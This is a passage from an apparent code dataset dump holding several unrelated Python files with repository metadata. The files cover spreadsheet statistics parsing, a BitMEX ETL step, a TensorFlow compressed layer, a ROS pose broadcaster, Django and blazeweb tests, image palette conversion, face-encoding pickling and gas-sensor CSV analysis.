estadisticaExistente.setAprobadosTeoria(self.datosExistentesPeriodo[codigo][\"aprobadosTeoria\"])\n estadisticaExistente.setReprobadosTeoria(self.datosExistentesPeriodo[codigo][\"reprobadosTeoria\"])\n estadisticaExistente.setInscritosLaboratorio(self.datosExistentesPeriodo[codigo][\"inscritosLaboratorio\"])\n estadisticaExistente.setAprobadosLaboratorio(self.datosExistentesPeriodo[codigo][\"aprobadosLaboratorio\"])\n estadisticaExistente.setReprobadosLaboratorio(self.datosExistentesPeriodo[codigo][\"reprobadosLaboratorio\"])\n estadisticaExistente.setTasaAprobacionTeoria(self.datosExistentesPeriodo[codigo][\"tasaAprobacionTeoria\"])\n estadisticaExistente.setTasaAprobacionLaboratorio(self.datosExistentesPeriodo[codigo][\"tasaAprobacionLaboratorio\"])\n estadisticaExistente.setTasaDesinscripcion(self.datosExistentesPeriodo[codigo][\"tasaDesinscripcion\"])\n estadisticaComplementada = self.complementarEstadisticas(estadisticaExistente, estadisticasArchivo[codigo])\n estadisticasArchivo[codigo] = estadisticaComplementada\n return estadisticasArchivo\n\n def complementarEstadisticas(self, estadisticaExistente, estadisticaNueva): \n if estadisticaExistente.inscritosTeoria == 0:\n estadisticaExistente.inscritosTeoria = estadisticaNueva.inscritosTeoria\n if estadisticaExistente.aprobadosTeoria == 0:\n estadisticaExistente.aprobadosTeoria = estadisticaNueva.aprobadosTeoria\n if estadisticaExistente.reprobadosTeoria == 0:\n estadisticaExistente.reprobadosTeoria = estadisticaNueva.reprobadosTeoria\n if estadisticaExistente.inscritosLaboratorio == 0:\n estadisticaExistente.inscritosLaboratorio = estadisticaNueva.inscritosLaboratorio\n if estadisticaExistente.aprobadosLaboratorio == 0:\n estadisticaExistente.aprobadosLaboratorio = estadisticaNueva.aprobadosLaboratorio\n if estadisticaExistente.reprobadosLaboratorio == 0:\n estadisticaExistente.reprobadosLaboratorio = estadisticaNueva.reprobadosLaboratorio\n estadisticaExistente.calcularTasas()\n return estadisticaExistente\n\n def mostrarVistaLecturaPlanilla(self):\n self.GUI.addWidget(self.vistaLecturaPlanilla)\n self.GUI.setCurrentIndex(self.GUI.currentIndex()+1)\n\n def volverContextoPrincipal(self):\n self.controladorPrincipal.mostrarVistaPrincipal()\n \n def anoValido(self,ano):\n if not ano.isnumeric():\n return False\n ano = int(ano)\n if ano >= 2015 and ano <= 2050:\n return True\n\n def semestreValido(self, semestre):\n if semestre == 1 or semestre == 2:\n return True\n \n def nombreArchivoValido(self, nombreArchivo):\n if nombreArchivo == \"\":\n return False\n return True\n\n def identificarTipoPlanilla(self, nombreArchivo):\n try:\n data = pd.read_excel(nombreArchivo,skiprows=2)\n columns = data.columns.values.tolist()\n if 'Código Ejecución' in columns and 'Código Civil' in columns and 'COORD.' in columns and 'INSCRITOS' in columns and 'APROBADOS' in columns and 'REPROBADOS' in columns:\n return 2\n elif 'Código Ejecución' in columns and 'Código Civil' in columns and 'COORD.' in columns and 'INSCRITOS' in columns:\n return 1\n except:\n return 0\n\n def leerPlanillaTipo1(self, nombreArchivo):\n data = pd.read_excel(nombreArchivo,usecols=\"A,B,D,S\",skiprows=2)\n data = data.T\n estadisticas = {}\n cantidadFilas = data.shape[1]\n for i in range(cantidadFilas):\n fila = data.iloc[:, i]\n codigoEjecucionValido, codigoEjecucion= self.validarCodigo(fila[\"Código Ejecución\"])\n codigoCivilValido, codigoCivil= self.validarCodigo(fila[\"Código Civil\"])\n coordinacion = fila[\"COORD.\"]\n inscritos = fila[\"INSCRITOS\"]\n if codigoEjecucionValido:\n estadisticas = self.agregarInscritosEstadisticas(estadisticas, codigoEjecucion, coordinacion, inscritos)\n elif codigoCivilValido:\n estadisticas = self.agregarInscritosEstadisticas(estadisticas, codigoCivil, coordinacion, inscritos)\n for codigo in estadisticas:\n estadisticas[codigo].calcularTasas()\n return estadisticas\n\n def leerPlanillaTipo2(self, nombreArchivo):\n data = pd.read_excel(nombreArchivo,usecols=\"A,B,D,S,AB,AC\",skiprows=2)\n data = data.T\n estadisticas = {}\n cantidadFilas = data.shape[1]\n for i in range(cantidadFilas):\n fila = data.iloc[:, i]\n codigoEjecucionValido, codigoEjecucion= self.validarCodigo(fila[\"Código Ejecución\"])\n codigoCivilValido, codigoCivil= self.validarCodigo(fila[\"Código Civil\"])\n coordinacion = fila[\"COORD.\"]\n inscritos = fila[\"INSCRITOS\"]\n aprobados = fila[\"APROBADOS\"]\n reprobados = fila[\"REPROBADOS\"]\n if codigoEjecucionValido:\n estadisticas = self.agregarInscritosEstadisticas(estadisticas, codigoEjecucion, coordinacion, inscritos)\n estadisticas = self.agregarAprobadosEstadisticas(estadisticas, codigoEjecucion, coordinacion, aprobados)\n estadisticas = self.agregarReprobadosEstadisticas(estadisticas, codigoEjecucion, coordinacion, reprobados)\n elif codigoCivilValido:\n estadisticas = self.agregarInscritosEstadisticas(estadisticas, codigoCivil, coordinacion, inscritos)\n estadisticas = self.agregarAprobadosEstadisticas(estadisticas, codigoCivil, coordinacion, aprobados)\n estadisticas = self.agregarReprobadosEstadisticas(estadisticas, codigoCivil, coordinacion, reprobados)\n for codigo in estadisticas:\n estadisticas[codigo].calcularTasas()\n return estadisticas\n\n def validarCodigo(self, codigo):\n\n valor = 0\n if isinstance(codigo,int):\n valor = codigo\n elif isinstance(codigo,str):\n valores = re.split(' |/', codigo)\n i = 0\n while i < len(valores):\n if valores[i].isnumeric():\n i = i+1\n else:\n del valores[i]\n if len(valores)>= 1:\n valor = int(valores[0])\n if valor in self.asignaturasRegistradas:\n return True,valor\n else:\n return False,valor\n\n def agregarInscritosEstadisticas(self, estadisticas, codigo ,coordinacion, inscritos):\n if codigo in estadisticas:\n estadisticas[codigo].agregarInscritos(coordinacion, inscritos)\n return estadisticas\n nuevaAsignatura = EstadisticaAsignatura(self.ano, self.semestre, codigo)\n nuevaAsignatura.agregarInscritos(coordinacion, inscritos)\n estadisticas[codigo] = nuevaAsignatura\n return estadisticas\n\n def agregarAprobadosEstadisticas(self, estadisticas, codigo, coordinacion, aprobados):\n if codigo in estadisticas:\n estadisticas[codigo].agregarAprobados(coordinacion, aprobados)\n return estadisticas\n nuevaAsignatura = EstadisticaAsignatura(self.ano, self.semestre, codigo)\n nuevaAsignatura.agregarAprobados(coordinacion, aprobados)\n estadisticas[codigo] = nuevaAsignatura\n return estadisticas\n\n def agregarReprobadosEstadisticas(self, estadisticas, codigo, coordinacion, reprobados):\n if codigo in estadisticas:\n estadisticas[codigo].agregarReprobados(coordinacion, reprobados)\n return estadisticas\n nuevaAsignatura = EstadisticaAsignatura(self.ano, self.semestre, codigo)\n nuevaAsignatura.agregarReprobados(coordinacion, reprobados)\n estadisticas[codigo] = nuevaAsignatura\n return estadisticas","repo_name":"nvierass/Proyecto-ECCA","sub_path":"Controladores/ControladorLecturaPlanilla.py","file_name":"ControladorLecturaPlanilla.py","file_ext":"py","file_size_in_byte":11880,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"73838515524","text":"from datetime import timezone\n\nimport numpy as np\nimport pandas as pd\n\n\ndef prepare_s3(date, data_frame, strip_nanoseconds=True):\n timestamp_format = \"%Y-%m-%dD%H:%M:%S.%f\"\n data_frame[\"timestamp\"] = pd.to_datetime(\n data_frame[\"timestamp\"], format=timestamp_format\n )\n # Because pyarrow.lib.ArrowInvalid: Casting from timestamp[ns]\n # to timestamp[us, tz=UTC] would lose data.\n data_frame[\"timestamp\"] = data_frame.apply(\n lambda x: x.timestamp.tz_localize(timezone.utc), axis=1\n )\n # Bitmex data is accurate to the nanosecond.\n # However, data is typically only provided to the microsecond.\n data_frame[\"nanoseconds\"] = data_frame.apply(\n lambda x: x.timestamp.nanosecond, axis=1\n )\n with_nanoseconds = data_frame[data_frame[\"nanoseconds\"] > 0]\n # On 2017-09-08 there is one timestamp with nanoseconds.\n # If kwarg self.string_nanoeconds, then strip.\n total = len(with_nanoseconds)\n if total:\n date_string = date.isoformat()\n rows = \"row\" if total == 1 else \"rows\"\n print(f\"Unsupported nanoseconds: {total} {rows} on {date_string}\")\n if strip_nanoseconds:\n data_frame[\"timestamp\"] = data_frame.apply(\n lambda x: x.timestamp.replace(nanosecond=0)\n if x.nanoseconds > 0\n else x.timestamp,\n axis=1,\n )\n data_frame[\"nanoseconds\"] = data_frame.apply(\n lambda x: x.timestamp.nanosecond, axis=1\n )\n with_nanoseconds = data_frame[data_frame[\"nanoseconds\"] > 0]\n assert len(with_nanoseconds) == 0\n data_frame.insert(0, \"date\", data_frame[\"timestamp\"].dt.date)\n data_frame = data_frame.rename(columns={\"size\": \"volume\"})\n data_frame[\"tickRule\"] = data_frame.apply(\n lambda x: (1 if x.tickDirection in (\"PlusTick\", \"ZeroPlusTick\") else -1),\n axis=1,\n )\n symbols = data_frame[\"symbol\"].unique()\n data_frame[\"index\"] = np.nan\n for symbol in symbols:\n index = data_frame.index[data_frame[\"symbol\"] == symbol]\n # 0-based index according to symbol.\n data_frame.loc[index, \"index\"] = index.values - index.values[0]\n data_frame = data_frame.astype(\n {\"price\": \"float64\", \"volume\": \"int64\", \"index\": \"int64\"}\n )\n data_frame[\"sequence\"] = 0\n return data_frame\n","repo_name":"maestro73/bitmex-historical-etl","sub_path":"bitmex_historical_etl/transforms/prepare_s3.py","file_name":"prepare_s3.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"15110378288","text":"# Функция проверки доступа Usera к данным\ndef verificate_User(x):\n status_Verif = False\n con = None\n con = sqlite3.connect('c:/projects/ultrabot/db_current_user.db')\n cursor = con.cursor()\n cursor.execute(\"SELECT * FROM Users\")\n results = cursor.fetchall()\n for user_info in results:\n if str(x) == str(user_info[6]):\n status_Verif = True\n con.close()\n\n\n# def current_User_Autorize():\n\n# update.message.reply_text(\n# f'Привет {update.message.chat.id}, Я бот \\n' +\n# f'я умею выполнять команды:')\n# for arr_to_str in bigdata.bot_set_config:\n# update.message.reply_text(\n# f'{arr_to_str} - {bigdata.bot_set_config[arr_to_str]}')\n","repo_name":"innerhard/telegram_bot_python","sub_path":"db_connector.py","file_name":"db_connector.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"31647325442","text":"from absl import logging\nimport tensorflow as tf\n\n\nclass CompressedDense(tf.keras.layers.Dense):\n \"\"\"A compressed Dense keras layer with the compression op.\n\n The compression_obj.get_spec().rank must be divisibe by\n compression_obj.get_spec().input_block_size. The input size to the layer\n must be divisible by compression_obj.get_spec().input_block_size which\n in turn must be divisible by compression_obj.get_spec().rank.\n \"\"\"\n\n def __init__(self,\n units,\n activation=None,\n use_bias=True,\n kernel_initializer='glorot_uniform',\n bias_initializer='zeros',\n kernel_regularizer=None,\n bias_regularizer=None,\n activity_regularizer=None,\n kernel_constraint=None,\n bias_constraint=None,\n compression_obj=None,\n **kwargs):\n \"\"\"Initializer.\n\n Args:\n units: Positive integer, dimensionality of the output space.\n activation: Activation function to use. If you don't specify anything, no\n activation is applied\n (ie. \"linear\" activation: `a(x) = x`).\n use_bias: Boolean, whether the layer uses a bias vector.\n kernel_initializer: Initializer for the `kernel` weights matrix.\n bias_initializer: Initializer for the bias vector.\n kernel_regularizer: Regularizer function applied to the `kernel` weights\n matrix.\n bias_regularizer: Regularizer function applied to the bias vector.\n activity_regularizer: Regularizer function applied to the output of the\n layer (its \"activation\").\n kernel_constraint: Constraint function applied to the `kernel` weights\n matrix.\n bias_constraint: Constraint function applied to the bias vector.\n compression_obj: Compression object contaning compression parameters The\n compression_obj.get_spec().rank must be divisibe by\n compression_obj.get_spec().input_block_size. The input size to the layer\n must be divisible by compression_obj.get_spec().input_block_size which\n in turn must be divisible by compression_obj.get_spec().rank.\n **kwargs: additional keyword arguments.\n \"\"\"\n\n super().__init__(units, activation, use_bias, kernel_initializer,\n bias_initializer, kernel_regularizer, bias_regularizer,\n activity_regularizer, kernel_constraint, bias_constraint,\n **kwargs)\n self.compression_obj = compression_obj\n self.compression_op = None\n self.alpha = -1\n\n def build(self, input_shape):\n super().build(input_shape)\n self.compression_op = self.compression_obj.apply_compression_keras(\n self.kernel, layer=self)\n\n logging.info(\n 'in build kernel a_matrix b_matrix and c_matrix shape is %s %s %s %s',\n self.kernel.shape, self.compression_op.a_matrix_tfvar.shape,\n self.compression_op.b_matrix_tfvar.shape,\n self.compression_op.c_matrix_tfvar.shape)\n\n def call(self, inputs, training=None):\n if training is None:\n training = tf.keras.backend.learning_phase()\n if training:\n self.compression_op.maybe_run_update_step()\n return self.activation(\n self.compression_op.compressed_matmul_keras(inputs, training=training) +\n self.bias)\n","repo_name":"google-research/google-research","sub_path":"non_semantic_speech_benchmark/distillation/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":3308,"program_lang":"python","lang":"en","doc_type":"code","stars":31433,"dataset":"github-code","pt":"99"} +{"seq_id":"11732055641","text":"#!/usr/bin/env python3\n\n# IMPORTS\n# system\nimport os, sys, argparse, time\nimport pdb\n# math\nimport numpy as np\nimport cv2\n# ros\nimport rospy\nimport tf\nimport tf2_ros\nimport std_msgs\nfrom geometry_msgs.msg import PoseStamped, Twist, Pose\nfrom std_msgs.msg import Header\n# other\nimport yaml\n\n\nclass gt_pose_broadcaster:\n def __init__(self):\n rospy.init_node('gt_pose_broadcaster', anonymous=True)\n rate = rospy.Rate(60)\n ns = rospy.get_param('~ns')\n gt_poses_to_broadcast_yaml = rospy.get_param('~gt_poses_to_broadcast_yaml')\n\n # create tf publisher & timer\n self.wfb = tf2_ros.TransformBroadcaster()\n self.gt_obs = []\n with open(gt_poses_to_broadcast_yaml, 'r') as stream:\n try:\n gt_poses = list(yaml.load_all(stream))\n print(\"broadcasting gt pose for {} objects\".format(len(gt_poses)))\n for gt_object_dict in gt_poses:\n obj_ns = gt_object_dict[\"ns\"]\n topic = \"/{}/mavros/vision_pose/pose\".format(obj_ns)\n p = Pose()\n p.position.x = gt_object_dict[\"x\"]\n p.position.y = gt_object_dict[\"y\"]\n p.position.z = gt_object_dict[\"z\"]\n p.orientation.x = gt_object_dict[\"qx\"]\n p.orientation.y = gt_object_dict[\"qy\"]\n p.orientation.z = gt_object_dict[\"qz\"]\n p.orientation.w = gt_object_dict[\"qw\"]\n frame = self.frame_from_pose(p, child_frame_id=obj_ns)\n h = std_msgs.msg.Header()\n h.stamp = rospy.Time.now()\n # print(h.stamp)\n h.frame_id = \"world\"\n ps = PoseStamped()\n ps.header = h\n ps.pose = p\n publisher = rospy.Publisher(topic, PoseStamped, queue_size=1)\n self.gt_obs.append((p, ps, frame, publisher))\n except yaml.YAMLError as exc:\n print(exc)\n\n # pdb.set_trace()\n \n while not rospy.is_shutdown():\n self.publish_gts()\n rate.sleep()\n\n def publish_gts(self):\n for p, ps, frame, publisher in self.gt_obs:\n publisher.publish(ps)\n # print(ps)\n\n\n def frame_from_pose(self, pose, child_frame_id, parent_frame_id='world'):\n frame = tf2_ros.TransformStamped()\n frame.header.frame_id = parent_frame_id\n frame.child_frame_id = child_frame_id\n frame.header.stamp = rospy.Time.now()\n\n frame.transform.translation.x = pose.position.x\n frame.transform.translation.y = pose.position.y\n frame.transform.translation.z = pose.position.z\n frame.transform.rotation.x = pose.orientation.x\n frame.transform.rotation.y = pose.orientation.y\n frame.transform.rotation.z = pose.orientation.z\n frame.transform.rotation.w = pose.orientation.w\n return frame\n\nif __name__ == '__main__':\n np.set_printoptions(linewidth=160, suppress=True) # format numpy so printing matrices is more clear\n try:\n program = gt_pose_broadcaster()\n except:\n import traceback\n traceback.print_exc()\n print(\"--------------- FINISHED gt pose broadcaster---------------\")\n\n\n","repo_name":"StanfordMSL/MSL-RAPTOR","sub_path":"src/utils_msl_raptor/gt_pose_broadcaster.py","file_name":"gt_pose_broadcaster.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"99"} +{"seq_id":"70394780485","text":"\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [(\"ms_products\", \"0001_initial\")]\n\n operations = [\n migrations.AlterField(\n model_name=\"product\", name=\"extra_metadata\", field=models.JSONField(blank=True, default=list)\n )\n ]\n","repo_name":"K-Wojciechowski/mobishopper-web","sub_path":"ms_products/migrations/0002_extra_meta_blank.py","file_name":"0002_extra_meta_blank.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"2339479547","text":"from PIL import Image\nimport numpy as np\nimport os\n\nsplit = \"validation\"\npath_to_masks = split+\"/Semantic/\"\npath_to_edited = split+\"/Semantic_palette/\"\nos.makedirs(path_to_edited, exist_ok=True)\n\nsrc_palette = Image.open(\"all_palette.png\")\nsrc_palette = src_palette.convert(\"P\", palette=Image.ADAPTIVE)\n\nimages = [x for x in os.listdir(path_to_masks) if \".\" in x]\nfor name in images:\n img = Image.open(path_to_masks+name).quantize(palette=src_palette)\n img.save(path_to_edited+name)","repo_name":"GhadeerElmkaiel/dataset_structure","sub_path":"useful code/convert_images_to_palette.py","file_name":"convert_images_to_palette.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"19431911638","text":"import os\r\nimport cv2\r\nimport face_recognition as recog\r\nimport pickle\r\n\r\nstarting_dir = 'C:/Users/amans/Documents/AI_python/demo_images/known'\r\n\r\ndata = []\r\n\r\nfor root, dirs, files in os.walk(starting_dir):\r\n print(\"You are in the directory: {}\".format(root))\r\n print(\"Folders in the directory: {}\".format(dirs))\r\n print(\"FIles in the directory: {}\".format(files))\r\n\r\n for file in files:\r\n full_path = starting_dir + '/' + file\r\n picture = recog.load_image_file(full_path)\r\n pictureBGR = cv2.cvtColor(picture, cv2.COLOR_RGB2BGR) # This is becasue .jpg are saved in the RBG colour space and CV\r\n name = file[:-4]\r\n # wants BGR\r\n face_encoding = recog.face_encodings(pictureBGR)[0]\r\n data.append([name, face_encoding])\r\n\r\nwith open('my_data.pkl', 'wb') as md:\r\n pickle.dump(data, md)\r\n","repo_name":"amansoo/Homework_Solutions","sub_path":"AI_series/openCV_13_HW_PT_1.py","file_name":"openCV_13_HW_PT_1.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"31435471778","text":"from blazeweb.globals import ag, settings\nfrom blazeweb.testing import TestApp\nfrom nose.tools import eq_\n\nfrom authbwc.lib.testing import login_client_with_permissions\nfrom commonbwc.lib.testing import has_message\nfrom compstack.sqlalchemy import db\nfrom basebwa_ta.model.orm import Widget\n\n\nclass TestCrud(object):\n @classmethod\n def setup_class(cls):\n cls.ta = TestApp(ag.wsgi_test_app)\n\n def create_widget(self, widget_type, color, quantity):\n w = Widget(widget_type=widget_type, color=color, quantity=quantity)\n db.sess.add(w)\n db.sess.commit()\n return w\n\n def test_add(self):\n r = self.ta.get('/widget/add/999999', status=400)\n\n r = self.ta.get('/widget/add')\n d = r.pyq\n eq_(d('form:first').attr('id'), 'widget-form', r)\n assert d('h2').text() == 'Add Widget'\n assert d('form#widget-form').attr.action == '/widget/add'\n assert d('span#widget-form-cancel a').attr.href == '/widget/manage'\n\n r.form['widget_type'] = 'Type A'\n r.form['color'] = 'silver'\n r = r.form.submit('submit', status=200)\n assert '/widget/add' in r.request.url\n\n r.form['quantity'] = '87'\n r = r.form.submit('submit', status=302)\n assert '/widget/add' in r.request.url\n r = r.follow(status=200)\n assert '/widget/manage' in r.request.url\n\n def test_edit(self):\n r = self.ta.get('/widget/edit', status=404)\n r = self.ta.get('/widget/edit/999999', status=404)\n\n w_id = self.create_widget(u'edit_test_widget', u'black', 150).id\n r = self.ta.get('/widget/edit/%s' % w_id)\n d = r.pyq\n eq_(d('form:first').attr('id'), 'widget-form', r)\n assert d('form#widget-form').attr.action == '/widget/edit/%s' % w_id\n assert d('h2').text() == 'Edit Widget'\n assert d('input[name=\"widget_type\"]').val() == 'edit_test_widget'\n assert d('input[name=\"color\"]').val() == 'black'\n assert d('input[name=\"quantity\"]').val() == '150'\n\n r.form['quantity'] = '75'\n r = r.form.submit('submit', status=302)\n assert '/widget/edit/%s' % w_id in r.request.url\n r = r.follow(status=200)\n assert '/widget/manage' in r.request.url\n\n w = Widget.get(w_id)\n assert w.quantity == 75\n\n def test_manage(self):\n r = self.ta.get('/widget/manage/999999', status=400)\n r = self.ta.post('/widget/manage', status=400)\n\n w_id = self.create_widget(u'manage_test_widget', u'black', 150).id\n\n r = self.ta.get('/widget/manage?filteron=type&filteronop=eq&filterfor=manage_test_widget')\n d = r.pyq\n assert d('form#widget-form').html() is None\n assert d('h2:eq(0)').text().startswith('Manage Widgets')\n assert d('p a').eq(0).attr.href.startswith('/widget/add')\n assert d('a[href^=\"/widget/edit/%s\"]' % w_id).html() is not None\n assert d('a[href^=\"/widget/delete/%s\"]' % w_id).html() is not None\n\n def test_delete(self):\n r = self.ta.get('/widget/delete', status=404)\n r = self.ta.get('/widget/delete/999999', status=404)\n\n w_id = self.create_widget(u'delete_test_widget', u'black', 150).id\n r = self.ta.post('/widget/delete/%s' % w_id, status=400)\n r = self.ta.get('/widget/delete/%s' % w_id, status=302)\n assert '/widget/delete/%s' % w_id in r.request.url\n\n r = r.follow(status=200)\n assert '/widget/manage' in r.request.url\n\n w = Widget.get(w_id)\n assert w is None\n\n def test_bad_action(self):\n self.ta.get('/widget/badaction', status=404)\n self.ta.get('/widget/badaction/999999', status=404)\n\n def test_delete_protect(self):\n w_id = self.create_widget(u'delete_protect_test_widget', u'black', 150).id\n\n r = self.ta.get('/widget-auth/manage?filteron=type&filteronop=eq&'\n 'filterfor=delete_protect_test_widget')\n d = r.pyq\n assert d('a[href^=\"/widget-auth/edit/%s\"]' % w_id).html() is not None\n assert d('a[href^=\"/widget-auth/delete/%s\"]' % w_id).html() is None\n r = self.ta.get('/widget-auth/delete/%s' % w_id, status=403)\n\n login_client_with_permissions(self.ta, u'widget-delete')\n r = self.ta.get('/widget-auth/manage?filteron=type&filteronop=eq&'\n 'filterfor=delete_protect_test_widget')\n d = r.pyq\n assert d('a[href^=\"/widget-auth/edit/%s\"]' % w_id).html() is not None\n assert d('a[href^=\"/widget-auth/delete/%s\"]' % w_id).html() is not None\n r = self.ta.get('/widget-auth/delete/%s' % w_id, status=302)\n self.ta.get('/users/logout')\n\n\nclass TestFormErrors(object):\n @classmethod\n def setup_class(cls):\n cls.ta = TestApp(ag.wsgi_test_app)\n\n def test_required(self):\n r = self.ta.get('/widget/add')\n r.form['widget_type'] = 'Type A'\n r.form['color'] = 'silver'\n r = r.form.submit('submit', status=200)\n d = r.pyq\n assert has_message(d, 'error', 'Quantity: field is required')\n\n def test_maxlength(self):\n r = self.ta.get('/widget/add')\n r.form['widget_type'] = ''.join(['a' for i in range(260)])\n r.form['color'] = 'silver'\n r.form['quantity'] = 125\n r = r.form.submit('submit', status=200)\n d = r.pyq\n assert has_message(d, 'error', 'Type: Enter a value not greater than 255 characters long')\n\n\nclass TestAdminTemplating(object):\n\n @classmethod\n def setup_class(cls):\n cls.ta = TestApp(ag.wsgi_test_app)\n settings.template.admin = 'admin.html'\n\n def test_primary_content_block(self):\n r = self.ta.get('/admin-templating/pc-block')\n assert 'pc content' in r\n\n\nclass TestDefaultTemplating(TestAdminTemplating):\n\n @classmethod\n def setup_class(cls):\n cls.ta = TestApp(ag.wsgi_test_app)\n settings.template.admin = 'default.html'\n\n\nclass TestDynamicControlPanel(object):\n\n @classmethod\n def setup_class(cls):\n cls.ta = TestApp(ag.wsgi_test_app)\n login_client_with_permissions(cls.ta, (u'webapp-controlpanel', u'auth-manage'))\n\n def test_panel(self):\n r = self.ta.get('/control-panel')\n assert r.status == '200 OK'\n expected = ''.join(\"\"\"\n
\n

Users

\n \n \n \n
\"\"\".split())\n assert expected in ''.join(r.body.decode().split())\n","repo_name":"blazelibs/basebwa","sub_path":"basebwa_ta/tests/test_functional.py","file_name":"test_functional.py","file_ext":"py","file_size_in_byte":6845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"71133133766","text":"import csv\nimport random\nimport operator\nimport numpy as np\nclass Gases:\n def __init__(self, sample=None, ammonia = None ,cyclohexanone= None,acetone = None,ethanol = None,methanol =None ,sensor_1 = None,\n sensor_2 = None,sensor_3 = None,sensor_4 = None):\n self.sample = sample\n self.ammonia = ammonia\n self.cyclohexanone = cyclohexanone\n self.acetone =acetone\n self.ethanol = ethanol\n self.methanol = methanol\n self.sensor_1 = sensor_1\n self.sensor_2 = sensor_2\n self.sensor_3 = sensor_3\n self.sensor_4 = sensor_4\n\ndef read_file():\n sensor_1 = []\n sensor_2 =[]\n sensor_3 =[]\n sensor_4 =[]\n gas_list =[]\n gas_sensor_1 =[]\n gas_sensor_2 =[]\n gas_sensor_3 =[]\n gas_sensor_4 =[]\n gas_conc=[]\n\n\n with open('combined.txt', 'r') as data:\n header = next(data)\n header =header.strip()\n for reading in csv.reader(data, delimiter=\",\"):\n reading = [float(i) for i in reading]\n gas_list.append(Gases(reading[0],reading[1],reading[2],reading[3],reading[4],reading[5],reading[6]\n ,reading[7],reading[8],reading[9]))\n sensor_1.append(reading[6])\n sensor_2.append(reading[7])\n sensor_3.append(reading[8])\n sensor_4.append(reading[9])\n print(header)\n count_1 = 0\n for entry in gas_list:\n if entry.sample == 1.0 or entry.sample == 2.0 or entry.sample == 3.0 or entry.sample == 4.0 or \\\n entry.sample == 6.0 or entry.sample == 10.0:\n gas_sensor_1.append(entry.sensor_1)\n gas_sensor_2.append(entry.sensor_2)\n gas_sensor_3.append(entry.sensor_3)\n gas_sensor_4.append(entry.sensor_4)\n gas_conc.append(entry.ammonia)\n count_1 += 1\n sensor_main = gas_sensor_1 + gas_sensor_2 + gas_sensor_3 + gas_sensor_4\n gas_main = gas_conc\n gas_sensor_1 =[]\n gas_sensor_2=[]\n gas_sensor_3 =[]\n gas_sensor_4=[]\n gas_conc = []\n count =0\n for entry in gas_list:\n if entry.sample == 1.0 or entry.sample == 7.0 or entry.sample == 10.0:\n gas_sensor_1.append(entry.sensor_1)\n gas_sensor_2.append(entry.sensor_2)\n gas_sensor_3.append(entry.sensor_3)\n gas_sensor_4.append(entry.sensor_4)\n gas_conc.append(entry.cyclohexanone)\n count += 1\n sensor_main = sensor_main + gas_sensor_1 + gas_sensor_2 + gas_sensor_3 + gas_sensor_4\n\n\n\n gas_main = gas_main + gas_conc\n index = count_1 * 4\n gas1_sensor = sensor_main[:index]\n gas2_sensor = sensor_main[index:]\n gas_1= gas_main[:count_1]\n gas_2 =gas_main[count_1:]\n gas_2 = np.array(gas_2)\n gas_1 = np.array(gas_1)\n gas1_sensor = np.array_split(np.array(gas1_sensor), 4)\n gas2_sensor = np.array_split(np.array(gas2_sensor), 4)\n for i in range(4):\n print(np.corrcoef(gas1_sensor[i],gas_1)[0,1])\n for i in range(4):\n print(np.corrcoef(gas2_sensor[i],gas_2)[0,1])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nclass Report:\n def __init__(self, g=None, s = None ,status= None,r = None,sig =\n None ,m = None,c = None,):\n self.g = g\n self.s = s\n self.status = status\n self.r = r\n self.sig = sig\n self.m = m\n self.c = c\n\n\n\ndef populate():\n with open(\"gas_Sensor.csv\", \"w\") as file:\n writer = csv.writer(file)\n for s in range(100):\n for g in range(100):\n r = 0.4 + random.random()/2\n rand = random.random()\n if rand < 0.1:\n writer.writerow ((\"{}{}\".format(\"Gas\", g), \"{}{}\".format(\"Sensor\", s), \"Yes\",r,0.001,\n random.random()/500,20*random.random()))\n\n elif rand < 0.5:\n writer.writerow((\"{}{}\".format(\"Gas\", g), \"{}{}\".format(\"Sensor\", s), \"No\", 0, 0, 0, 0))\n file.close()\n\n\ndef load_report():\n r_lst = []\n with open(\"gas_Sensor.csv\", \"r\",) as report:\n r_reader = csv.reader(report, delimiter=',')\n sort = sorted(r_reader,reverse=True, key=operator.itemgetter(3))\n for row in sort:\n r_lst.append(Report(row[0],row[1],row[2],row[3],row[4],row[5],row[6]))\n report.close()\n return r_lst\n\n\ndef report():\n sensor_list=[]\n desired_gas =input(\"Enter Desired Gas\")\n with open(\"Sensor_report.csv\", 'w') as new_gas_report:\n r_writer = csv.writer(new_gas_report)\n gas_list =load_report()\n for item in gas_list:\n if item.g == desired_gas and item.status == \"Yes\":\n r_writer.writerow([item.g, item.s, item.status,item.r,item.sig,item.m,item.c])\n sensor_list.append(Report(item.g, item.s, item.status,item.r, item.sig, item.m,item.c))\n return sensor_list\n\n\ndef find_sensor(sensor_list):\n unwanted_gas = [(x) for x in\n input(\"Enter Unwanted Gases' name and include a space if adding multiple.: \").split()]\n gas_X = sensor_list\n bad_gases =load_report()\n for item in bad_gases:\n for gases in unwanted_gas:\n for items in gas_X:\n if item.g == gases and item.status == \"Yes\" and item.s == items.s:\n gas_X.remove(items)\n\n return sensor_list\n\n\n\n\n\n\ndef write_report():\n with open(\"Sensor_with_no_unwanted_gases_Report.csv\", 'w') as new_gas_report3:\n r_writer = csv.writer(new_gas_report3)\n sensor_list = report()\n sensor_list = find_sensor(sensor_list)\n for item in sensor_list:\n r_writer.writerow([item.g, item.s, item.status, item.r, item.sig, item.m, item.c])\n\n\n\ndef y_value(sensor_list):\n m =[]\n c =[]\n r =[]\n y = []\n y_max =[]\n s = [\"Sensor6\",\"Sensor45\",\"Sensor46\"]\n g =[\"Gas69\"]\n for sensors in s:\n 